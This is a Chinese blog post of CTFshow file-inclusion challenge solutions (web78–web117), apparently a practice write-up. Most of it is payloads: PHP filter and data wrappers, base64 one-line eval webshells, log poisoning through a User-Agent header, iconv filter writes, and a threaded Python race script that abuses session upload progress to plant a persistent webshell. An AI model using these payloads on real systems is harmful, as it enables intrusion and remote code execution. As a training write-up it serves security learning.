CTFSHOW—文件包含

最新推荐文章于 2024-05-23 22:03:05 发布
最新推荐文章于 2024-05-23 22:03:05 发布
阅读量574 收藏
点赞数 1
分类专栏: CTFSHOW刷题记录 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45449318/article/details/113629758
版权

web78

?file=php://filter/convert.base64-encode/resource=flag.php

web79
(php5.2.0起,数据流封装器开始有效,主要用于数据流的读取。如果传入的数据是PHP代码,就会执行代码
使用方法:data://text/plain;base64,xxxx(base64编码后的数据))
php被过滤使用data伪装协议执行代码

?file=data://text/plain;base64,PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg

web80
PHP绕过open_basedir限制操作文件的方法
open_basedir对system没有限制
str_replace对大小写敏感可以用大小写绕过

Php://input
<?php system("cat fl0g.php");?>

或者包含下日志写个shell

?file=/var/log/nginx/access.log
U-A:<?php eval($_POST[a]);?>

web81
包含下日志写个shell

?file=/var/log/nginx/access.log
U-A:<?php eval($_POST[a]);?>

这里写个容易踩的坑:
当U-A头:<?php system("ls")?>这样,再包含日志会执行出错误原因:
在使用access_log落日志,并且log_format中有$args时,由于nginx使用双引号作为分隔符,所以会强制将$args中的双引号换成x22。
web82

php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

利用session.upload_progress进行文件包含
脚本如下:在别的师傅的脚本上多加了个shell.

# coding=utf-8
import io
import requests
import threading

sessid = 'flag'
data = {"cmd": "system('cat fl0g.php');"}
url = "http://3ff61b5f-0a21-416c-9839-e61d9c871f18.chall.ctf.show/"

def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post(url,
                            data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php eval($_POST[cmd]);fputs(fopen('a.php','w'),'<?php @eval($_POST[wa1ki0g])?>');?>"},
                            files={'file': ('tgao.txt', f)}, cookies={'PHPSESSID': sessid})


def read(session):
    while True:
        resp = session.post(url+'?file=/tmp/sess_' + sessid,
                            data=data)
        if 'tgao.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            pass


if __name__ == "__main__":
    event = threading.Event()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()

        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()
    event.set()

web84-86
如上
web87
两篇师傅的文章
https://xz.aliyun.com/t/8163#toc-3
https://www.leavesongs.com/PENETRATION/php-filter-magic.html

php://filter/write=convert.base64-decode/resource=123.php
url编码两次:
%25%37%30%25%36%38%25%37%30%25%33%41%25%32%46%25%32%46%25%36%36%25%36%39%25%36%43%25%37%34%25%36%35%25%37%32%25%32%46%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%44%25%36%33%25%36%46%25%36%45%25%37%36%25%36%35%25%37%32%25%37%34%25%32%45%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%44%25%36%34%25%36%35%25%36%33%25%36%46%25%36%34%25%36%35%25%32%46%25%37%32%25%36%35%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%44%25%33%31%25%33%32%25%33%33%25%32%45%25%37%30%25%36%38%25%37%30
content写入经过base64编码过后的一句话加上两个aa aaPD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg==
这里content的值前面要加两个字符,
因为base64算法解码时是4个byte一组,
所以给他增加2个字符 一共8个字符

web88
同79
web117
base64与rot13都被过滤,看上面的那个连接一,用convert.iconv.绕过,我这里直接用的题给的payload

file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php 
post:contents=?<hp pvela$(P_SO[T]1;)>?

在这里插入图片描述
写进去shell,用hackerbar tac查看下就好了

qq_45449318
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
base解码_php://filter在一次CTF中base过滤的利用
weixin_39565910的博客
11-27 860
0x00 简介在一次线下ctf中的web题有一道关于php://filter伪协议的利用0x01题目分析靶机环境http://192.168.1.151:88/flag.php 存放flag信息的http://192.168.1.151:88/index.php 注释中有include1.phpinclude1代码如下error_reporting(0); @$file = $_G...
CTFshow-文件包含
qq_61376069的博客
01-19 247
CTFshow入门——文件包含
CTFshow之文件上传web入门151关-161关解密。包教包会!!!!
最新发布
2301_77578012的博客
05-23 1020
当网站进行扫描时,会将.user.ini文件指向路径内容包含在首页代码处(如index.php、index.html等),使用参数auto_prepend_file(包含至首页文件头部)和auto_append_file(包含在首页文件尾部)进行配置。发送一句话木马,修改content-type值为:image/png,此处注意一下,我直接上传.php文件发现无法通过,定睛一看才发现前端验证还没关,汗颜!上传1.png的木马。2.上传.user.ini文件(使用bp中repaeater重发器功能进行上传)
ctfshow文件包含
Vincent0sen的博客
11-13 1170
解法一 - php://input解法二 - data://
【ctfshow】文件上传web151-170wp
weixin_51614272的博客
02-26 1620
文件上传web151-170web1511.编写一句话木马上传2.修改前端验证3.在蚁剑上找flagweb1521.修改前端验证2.burp抓包后修改MIME3.在蚁剑上找flagweb1531.修改前端验证2.上传ini配置文件3.上传1.txt文件4.在蚁剑上找flagweb154 web155 web156 web157 web1581.修改前端验证2.上传ini配置文件3.上传1.txt文件4.在蚁剑上找flagweb159日志包含漏洞web160 web151 1.编写一句话木马上传 发现前端有
CTFshow刷题日记-WEB-文件包含
Love&Share
09-04 4142
文件包含专题 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 依旧是代码审计类型 直接伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php ?file=data://text/plain,<?php system("nl flag.php");
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
ctfshow web240 insert 爆破表名
10-21
ctfshow web240 insert 爆破表名
CTFshow_Web_文件上传——web151~web170
Ho1aAs‘s Blog
04-26 2360
文章目录工具题解Web 151~152Web 153Web 154Web 155Web 156Web 157~158Web 159Web 160Web 161Web 162Web 163Web 164Web 165Web 166Web 167Web 168~170完 工具 Burpsuite php 题解 Web 151~152 页面上,伪装成jpg的一句话木马无法上传,提示前后端验证 抓包,修改filename为xxx.php,MIME类型image/png 读取flag直接用通配符 # 151.ph
CTFSHOW-文件包含
Monica的博客
09-12 5571
WEB78 题目: <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 知识点:php伪协议 php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。 1、php://input
CTFShow web151-170 (文件上传)
lonmar的博客
12-02 5476
web151 前端检测类型,burp抓包修改文件名称即可 文件上传思路,先上传一张图片马,再慢慢测试过滤规则(文件名,之类的) web152 思路和前面的一致 web153 上传.user.ini配置文件 原理:https://www.dazhuanlan.com/2020/03/08/5e641cbc397c2/ 防挂 https://www.cnblogs.com/l0nmar/p/14053889.html 发现很容易上传如php5,phtml等类型文件,但是不解析.通过插件识别为ngin
基于CTFshow的web4下的文件包含学习
Cyber Striver的博客
09-26 1378
基于CTFshow的web4下的文件包含学习。还涉及ctfhub的文件包含题解。
ctfshow文件包含-超详解
qq_50589021的博客
08-05 1885
文件包含 web78-79 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?> 伪协议: ?file=php://filter/read=convert.base64-encode/resource=flag.php ?file=data://text/plain;base64,PD9waHAgc3lzd
nginx日志[配置解释]
编程不过是一门失传艺术的别名,这门艺术的名字叫做“思考”
12-14 3370
记录下 error_log和access_log的相关配置,及简略解释
BUU刷题记录——5
weixin_43610673的博客
09-21 1469
October 2019 Twice SQL Injection 由题目名可知为二次注入 username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select group
showCTF 入门文件包含系列
Hello_super的博客
09-21 355
web78 读取源代码: 心想,就这? 直接:http://url地址/?file=flag.php,但是这样出不来,页面什么也没有,想着这毕竟是一个PHP文件,可能在我们包含的时候被服务器给解析了。所以我们必须要让它不解析,这里提供一种方法,PHP伪协议中的:php://filter 直接: http://url地址/?file=php://filter/read/convert.base64-encode/resource=flag.php 成功获取flag.php的文件内容,在线网址解base64.
ctfshow 文件包含
07-28
- *1* *2* *3* [ctfshow文件包含](https://blog.csdn.net/njh18790816639/article/details/115582591)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值